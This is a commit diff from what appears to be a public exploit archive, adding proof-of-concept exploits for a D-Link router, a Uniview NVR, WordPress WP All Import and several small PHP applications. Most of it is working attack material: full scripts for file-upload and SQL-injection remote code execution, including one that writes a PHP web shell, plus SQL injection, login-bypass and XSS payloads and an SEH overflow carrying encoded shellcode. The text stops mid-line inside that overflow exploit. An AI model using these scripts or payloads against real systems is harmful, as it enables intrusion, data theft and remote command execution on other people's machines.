DB: 2023-03-30

13 changes to exploits/shellcodes/ghdb DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) Helmet Store Showroom v1.0 - SQL Injection Human Resource Management System 1.0 - SQL Injection (unauthenticated) Revenue Collection System v1.0 - Remote Code Execution (RCE) WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) Outline V1.6.0 - Unquoted Service Path Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
2023-03-30 00:16:31 +00:00 · 2023-03-30 00:16:31 +00:00 · 564d2ddf47
commit 564d2ddf47
parent 6bc7a6f9b0
13 changed files with 1026 additions and 0 deletions
--- a/exploits/hardware/remote/51129.txt
+++ b/exploits/hardware/remote/51129.txt
@ -0,0 +1,46 @@
 # Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
 # Date:  2022-11-10
 # Exploit Author: Aryan Chehreghani
 # Vendor Homepage: https://www.dlink.com
 # Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09
 # Firmware Version: ME_1.00
 # Tested on: Windows 11
 # [ Details - DSL-124 ]:
 #The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,
 #With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,
 #Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,
 #the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.
 # [ Description ]:
 #After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,
 #and in response to sending this request, she receives a complete backup of the router settings,
 #In fact this happens because of the lack of management of users and sessions in the network.
 # [ POC ]:
 Request :
 curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi
 Response :
 HTTP/1.1 200 OK
 Connection: close
 Server: Virtual Web 0.9
 Content-Type: application/octet-stream;
 Content-Disposition: attachment;filename="config.img"
 Pragma: no-cache
 Cache-Control: no-cache
 <Config_Information_File_8671>
 <V N="WLAN_WPA_PSK" V="pass@12345"/>
 <V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>
 <V N="WLAN_WPA_REKEY_TIME" V=""/>
 <V N="WLAN_ENABLE_1X" V="0x0"/>
 <V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/>
 <V N="WLAN_RS_IP" V="0.0.0.0"/>
 .
 .
 .
 </Config_Information_File_8671>
--- a/exploits/hardware/webapps/51130.txt
+++ b/exploits/hardware/webapps/51130.txt
@ -0,0 +1,44 @@
 # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
 # Author: Bleron Rrustemi
 # Discovery Date: 2022-11-15
 # Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/
 # Datasheet:: https://www.uniview.com/download.do?id=1761643
 # Device Firmware: NVR-B3801.20.15.200829
 # Tested Version: NVR301-04S2-P4
 # Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)
 # Vulnerability Type: Reflected Cross-Site Scripting (XSS)
 # CVE: N/A
 # Proof of Concept:
 IP=IP of the device
 http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>
 Best regards,
 Bleron Rrustemi
 Chief Technology Officer
 Direct: +383 (0) 49 955 503
 E-mail:  <mailto:bleron@drugeza.com> bleron@drugeza.com
 <http://>
 Drugëza SHPK
 Rr. Lekë Dukagjini p.n
 Prishtinë, 10000 • Kosovo
 Tel.: +383 49 955 503
 www.drugeza.com
 ü Be GREEN, keep it on the SCREEN
--- a/exploits/php/webapps/51122.py
+++ b/exploits/php/webapps/51122.py
@ -0,0 +1,285 @@
 # Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)
 # Date: 11/05/2022
 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
 # Vendor Homepage: https://www.wpallimport.com/
 # Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version)
 # Version: <= 3.6.7 (tested: 3.6.7)
 # Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload)
 # CVE: CVE-2022-1565
 #!/usr/bin/python
 import requests
 import re
 import os
 # WARNING: This exploit does NOT include the payload.
 # Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work.
 # If a file with the same name as the payload is already on the server, the upload will OVERWRITE it
 #
 # Please notice that I'm NOT the researcher who found this vulnerability
 # # # # # VULNERABILITY DESCRIPTION # # # # #
 # The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7.
 # This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible.
 # # # # # HOW THE EXPLOIT WORKS # # # # #
 # 1. Prepare the zip file:
 #   - create a PHP file with your payload (e.g. rerverse shell)
 #   - set the variable "payload_file_name" with the name of this file (e.g. "shell.php")
 #   - create a zip file with the payload
 #   - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip")
 #
 # 2. Login using an administrator account:
 #   - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /)
 #   - set the variable "admin_user" with the username of an administrator account
 #   - set the variable "admin_pass" with the password of an administrator account
 #
 # 3. Get the wpnonce using the get_wpnonce_upload_file() method
 #   - there are actually 2 types of wpnonce:
 #       - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class.
 #           This wpnonce allows us to change the plugin settings (check the step 4)
 #       - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class.
 #           This wpnonce allows us to upload the file
 #
 # 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class
 #   - if the Secure Mode is enabled, the zip content will be put in a folder with a random name.
 #       The exploit will disable the Secure Mode.
 #       By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url).
 #       The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str)
 #   - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode.
 #
 # 5. Upload the file using the upload_file(wpnonce_upload_file: str) method
 #   - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully.
 #       The response will contain a JSON that looks like this:
 #           {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"}
 #       As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed
 #
 # 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method
 #
 # 7. Activate the payload using the activate_payload() method
 #   - you can define a method to activate the payload.
 #       There reason behind this choice is that this exploit does NOT provide any payload.
 #       Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters
 # # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # #
 # According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page"
 # I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?)
 # I had to find a workaround and so I did, by exploiting this option.
 # WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7
 # # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # #
 # In order for the exploit to work please consider the following:
 # 1. check the target_url and the admin credentials
 # 2. check the path of the zip file and the name of the payload (they can be different)
 # 3. if you're testing locally, try to set verify_ssl_certificate on False
 # 4. you can use print_response(http_response) to investigate further
 # Configure the following variables:
 target_url = "https://vulnerable.wp/wordpress"  # Target base URL
 admin_user = "admin"                            # Administrator username
 admin_pass = "password"                         # Administrator password
 zip_file_to_upload = "/shell.zip"               # Path to the ZIP file (e.g /root/shell.zip)
 payload_file_name = "shell.php"                 # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell)
 verify_ssl_certificate = True                   # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed.
 # Do NOT change the following variables
 wp_login_url = target_url + "/wp-login.php"                                                 # WordPress login page
 wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings"   # Plugin page settings
 payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name   # Payload will be uploaded here
 re_enable_secure_mode = False
 session = requests.Session()
 # This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files.
 class PluginSetting:
    # Regular Expression patterns
    pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>'
    pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>'
    pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};'
    http_response: requests.Response
    is_secure_mode_enabled: bool
    wpnonce_edit_settings: str
    wpnonce_upload_file: str
    def __init__(self,  http_response: requests.Response):
        self.http_response = http_response
        self.check_if_secure_mode_is_enabled()
        self.retrieve_wpnonce_edit_settings()
        self.retrieve_wpnonce_upload_file()
    def check_if_secure_mode_is_enabled(self):
        # To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked
        # <input type="checkbox" value="1" id="secure" name="secure" checked="checked">
        regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text)
        if not regex_search:
            print("Something went wrong: could not retrieve plugin settings. Are you an administrator?")
            # print_response(self.http_response) # for debugging
            exit()
        self.is_secure_mode_enabled = "checked" in regex_search.group()
    def retrieve_wpnonce_edit_settings(self):
        # You can find this wpnonce in the source file by searching for the following input hidden:
        # <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9">
        # 052e2438f9 would be the wpnonce for editing the settings
        regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text)
        if not regex_search:
            print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?")
            # print_response(self.http_response) # for debugging
            exit()
        self.wpnonce_edit_settings = regex_search.group(1)
    def retrieve_wpnonce_upload_file(self):
        # You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b';
        # dee75fdb8b would be the wpnonce for the upload
        regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text)
        if not regex_search:
            print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable")
            # print_response(self.http_response) # for debugging
            exit()
        self.wpnonce_upload_file = regex_search.group(1)
 def wp_login():
    global session
    data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 }
    login_cookie = { "wordpress_test_cookie" : "WP Cookie check" }
    # allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found.
    # Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not
    print("Trying to login...")
    response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate)
    if response.status_code == 302:
        print("Logged in successfully!")
        return
    # print_response(response) # for debugging
    print("Login failed. If the credentials are correct, try to print the response to investigate further.")
    exit()
 def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response:
    global session
    if set_to_enabled:
        print("Enabling secure mode...")
    else:
        print("Disabling secure mode...")
    print("Edit settings wpnonce value: " + wpnonce)
    data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 }
    response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate)
    if response.status_code == 403:
        print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?")
        # print_response(response) # for debugging
        exit()
    return response
 def switch_back_to_secure_mode():
    global session
    print("Re-enabling secure mode...")
    response = session.get(url=wp_all_import_page_settings)
    plugin_setting = PluginSetting(response)
    if plugin_setting.is_secure_mode_enabled:
        print("Secure mode is already enabled")
        return
    response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings)
    new_plugin_setting = PluginSetting(response)
    if not new_plugin_setting.is_secure_mode_enabled:
        print("Something went wrong: secure mode has not been re-enabled")
        # print_response(response) # for debugging
        exit()
    print("Secure mode has been re-enabled!")
 def get_wpnonce_upload_file() -> str:
    global session, re_enable_secure_mode
    # If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload
    # If Secure Mode is already disabled, it just returns the wpnonce for the upload
    print("Checking if secure mode is enabled...")
    response = session.get(url=wp_all_import_page_settings)
    plugin_setting = PluginSetting(response)
    if not plugin_setting.is_secure_mode_enabled:
        re_enable_secure_mode = False
        print("Insecure mode is already enabled!")
        return plugin_setting.wpnonce_upload_file
    print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.")
    response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings)
    new_plugin_setting = PluginSetting(response)
    if new_plugin_setting.is_secure_mode_enabled:
        print("Something went wrong: secure mode has not been disabled")
        # print_response(response) # for debugging
        exit()
    print("Secure mode has been disabled!")
    re_enable_secure_mode = True
    return new_plugin_setting.wpnonce_upload_file
 def upload_file(wpnonce_upload_file: str):
    global session
    print("Uploading file...")
    print("Upload wpnonce value: " + wpnonce_upload_file)
    zip_file_name = os.path.basename(zip_file_to_upload)
    upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file
    files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))}
    data = { "name" : zip_file_name }
    response = session.post(url=upload_url, files=files, data=data)
    if response.status_code == 200:
        print("Server replied with HTTP 200 OK. The upload should be completed.")
        print("Payload should be here: " + payload_url)
        print("If you can't find the payload at this URL, try to print the response to investigate further")
        # print_response(response) # for debugging
        return 1
    else:
        print("Something went wrong during the upload. Try to print the response to investigate further")
        # print_response(response) # for debugging
        return 0
 def activate_payload():
    global session
    print("Activating payload...")
    response = session.get(url=payload_url)
    if response.status_code != 200:
        print("Something went wrong: could not find payload at " + payload_url)
        # print_response(response) # for debugging
        return
 def print_response(response:requests.Response):
    print(response.status_code)
    print(response.text)
 # Entry Point
 def Main():
    print("Target: " + target_url)
    print("Credentials: " + admin_user + ":" + admin_pass)
    # Do the login
    wp_login()
    # Retrieve wpnonce for upload.
    # It disables Secure Mode if needed, then returns the wpnonce
    wpnonce_upload_file = get_wpnonce_upload_file()
    # Upload the file
    file_uploaded = upload_file(wpnonce_upload_file)
    # Re-enable Secure Mode if needed
    if re_enable_secure_mode:
        switch_back_to_secure_mode()
    # Activate the payload
    if file_uploaded:
        activate_payload()
 Main()
--- a/exploits/php/webapps/51123.txt
+++ b/exploits/php/webapps/51123.txt
@ -0,0 +1,18 @@
 # Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
 # Date: 2022-11-08
 # Exploit Author: Rajeshwar Singh
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip
 # Tested on: Windows/XAMPP
 ###########################################################################
 Payload use = "><script>alert("XSS")</script>
 1. Visit URL http://localhost/bsms_ci/
 2. login with admin Credentials
 3. navigate to user Management
 4. Click on "Add New System User"
 5. Add  payload in "Name" input field
 6. Click save.
 7. Visit http://localhost/bsms_ci/index.php/user
 8. XSS payload execute.
--- a/exploits/php/webapps/51125.txt
+++ b/exploits/php/webapps/51125.txt
@ -0,0 +1,120 @@
 # Exploit Title: Human Resource Management System - SQL Injection (unauthenticated)
 # Date: 08-11-2022
 # Exploit Author: Matthijs van der Vaart (eMVee)
 # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
 # Version: 1.0 (Monday, October 10, 2022 - 13:37)
 # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
 1) Capture the login POST request with Burp Suite or OWASP ZAP
 2) Save the request as "login.req"
 3) Run sqlmap as follows: "sqlmap -r login.req"
 Example login.req
 ==========
 POST /controller/login.php HTTP/1.1
 Host: target
 Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 66
 Origin: https://target
 Referer: https://target/index.php<https://10.0.2.15/dashboard/hrm/index.php>
 Upgrade-Insecure-Requests: 1
 Sec-Fetch-Dest: document
 Sec-Fetch-Mode: navigate
 Sec-Fetch-Site: same-origin
 Sec-Fetch-User: ?1
 Te: trailers
 Connection: close
 name=admin%40gmail.com&password=password+&submit=Sign+In
 =========
 Output example SQL Injection unauthenticated login page
 ==========
 POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
 sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests:
 ---
 Parameter: password (POST)
 Type: boolean-based blind
 Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
 Payload: name=admin@gmail.com&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In
 Type: error-based
 Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
 Payload: name=admin@gmail.com&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In
 Type: time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 Payload: name=admin@gmail.com&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In
 Parameter: name (POST)
 Type: boolean-based blind
 Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
 Payload: name=admin@gmail.com' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In
 Type: error-based
 Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
 Payload: name=admin@gmail.com' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In
 Type: time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 Payload: name=admin@gmail.com' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In
 ---
 there were multiple injection points, please select the one to use for following injections:
 [0] place: POST, parameter: name, type: Single quoted string (default)
 [1] place: POST, parameter: password, type: Single quoted string
 ==========
--- a/exploits/php/webapps/51132.txt
+++ b/exploits/php/webapps/51132.txt
@ -0,0 +1,34 @@
 # Exploit Title: Helmet Store Showroom v1.0 - SQL Injection
 # Exploit Author: Ameer Hamza
 # Date: November 15, 2022
 # Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
 # Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code
 # Tested on: Kali Linux, Apache, Mysql
 # Vendor: oretnom23
 # Version: v1.0
 # Exploit Description:
 # Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.
 [+] The username parameter is vulnerable to SQLi in login page
 [+] URL --> http://localhost/hss/admin/login.php
 [+] Username = ' OR 1=1-- -
 HTTP REQUEST
 POST /hss/classes/Login.php?f=login HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 38
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/hss/admin/login.php
 Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa
 username='+OR+1%3D1+--+-&password=1234
--- a/exploits/php/webapps/51133.py
+++ b/exploits/php/webapps/51133.py
@ -0,0 +1,43 @@
 # Exploit Title: Revenue Collection System v1.0 - Remote Code Execution (RCE)
 # Exploit Author: Joe Pollock
 # Date: November 16, 2022
 # Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip
 # Tested on: Kali Linux, Apache, Mysql
 # Vendor: Kapiya
 # Version: 1.0
 # Exploit Description:
 #   Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to
 #   write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.
 #   This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.
 #   Ex: python3 rcsv1.py 10.10.14.2 "ls"
 import sys, requests
 def main():
 	if len(sys.argv) != 3:
 		print("(+) usage: %s <target> <cmd>" % sys.argv[0])
 		print('(+) eg: %s 192.168.121.103 "ls"'  % sys.argv[0])
 		sys.exit(-1)
 	targetIP = sys.argv[1]
 	cmd = sys.argv[2]
 	s = requests.Session()
 	# Define obscure filename and command parameter to limit exposure and usage of the RCE.
 	FILENAME = "youcantfindme.php"
 	CMDVAR = "ohno"
 	# Define the SQL injection string
 	sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)
 	# Write the PHP file to disk using the SQL injection vulnerability
 	url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)
 	r1 = s.get(url1)
 	# Execute the user defined command and display the result
 	url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)
 	r2 = s.get(url2)
 	print(r2.text)
 if __name__ == '__main__':
 	main()
--- a/exploits/windows/local/51128.txt
+++ b/exploits/windows/local/51128.txt
@ -0,0 +1,35 @@
 # Exploit Title: Outline V1.6.0 - Unquoted Service Path
 # Exploit Author: Milad Karimi (Ex3ptionaL)
 # Discovery Date: 2022-11-10
 # Vendor Homepage: https://getoutline.org/
 # Software Link: https://getoutline.org/
 # Tested Version: V1.6.0
 # Vulnerability Type: Unquoted Service Path
 # Tested on OS: Microsoft Windows 11 Enterprise
 # Step to discover Unquoted Service Path:
 C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
 Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe
                       Auto
 C:\>sc qc OutlineService
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: OutlineService
         TYPE               : 10  WIN32_OWN_PROCESS
         START_TYPE         : 2   AUTO_START
         ERROR_CONTROL      : 1   NORMAL
         BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe
 LOAD_ORDER_GROUP   :
         TAG                : 0
         DISPLAY_NAME       : OutlineService
         DEPENDENCIES       :
         SERVICE_START_NAME : LocalSystem
 C:\>systeminfo
 OS Name:  Microsoft Windows 11 Enterprise
 OS Version: 10.0.22000 N/A Build 22000
 OS Manufacturer: Microsoft Corporation
--- a/exploits/windows/remote/51126.py
+++ b/exploits/windows/remote/51126.py
@ -0,0 +1,121 @@
 # Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow
 # Date: 11/08/2022
 # Exploit Author: a-rey
 # Vendor Homepage: http://www.inbit.com/support.html
 # Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html
 # Version: v4.6.0 - v4.9.0
 # Tested on: Windows XP SP3, Windows 7, Windows 10
 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 import sys, socket, struct, argparse, logging
 """
 /opt/metasploit-framework/bin/msfvenom \
  -p windows/messagebox \
  ICON=WARNING          \
  TEXT="get wrecked"    \
  TITLE="LOLZ"          \
  EXITFUNC=thread       \
  -f py                 \
  -v SHELLCODE          \
  -e x86/shikata_ga_nai \
  -b '\x3E'
 """
 SHELLCODE =  b""
 SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4"
 SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14"
 SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1"
 SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd"
 SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07"
 SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29"
 SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde"
 SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e"
 SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc"
 SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43"
 SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0"
 SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee"
 SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20"
 SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50"
 SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19"
 SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77"
 SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f"
 SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd"
 SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f"
 SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86"
 SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93"
 SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40"
 SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44"
 SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e"
 SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf"
 SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3"
 BANNER = """\033[0m\033[1;35m
 ╔═════════════════════════════════════════════════════════════════════╗
 ║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║
 ╚═════════════════════════════════════════════════════════════════════╝\033[0m
 by: \033[1;36m █████╗      ██████╗ ███████╗██╗   ██╗
     \033[1;36m██╔══██╗     ██╔══██╗██╔════╝██║   ██║
     \033[1;36m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝
     \033[1;36m██╔══██║     ██╔══██╗██╔══╝     ██╔╝
     \033[1;36m██║  ██║     ██║  ██║███████╗   ██║
     \033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝
 \033[0m"""
 BAD_BYTES = b"\x3e" # >
 PAYLOAD_LENGTH = 2000
 nSEH = b"\xEB\x06\x90\x90"           # JMP SHORT 0x8; NOP; NOP
 SEH  = struct.pack("<I", 0x263ae1bd) # ipworks6.dll | POP EBP; POP EBX; RET
 # NOTE: sets the TEB's ACTIVATION_CONTEXT_STACK.ActiveFrame = NULL
 NULL_ACT_CTX_STUB  = b"\x31\xC0\xBB\x00\x10"
 NULL_ACT_CTX_STUB += b"\x00\x00\x64\x8B\x48"
 NULL_ACT_CTX_STUB += b"\x18\x39\x99\xA8\x01"
 NULL_ACT_CTX_STUB += b"\x00\x00\x7C\x0A\x8B"
 NULL_ACT_CTX_STUB += b"\x99\xA8\x01\x00\x00"
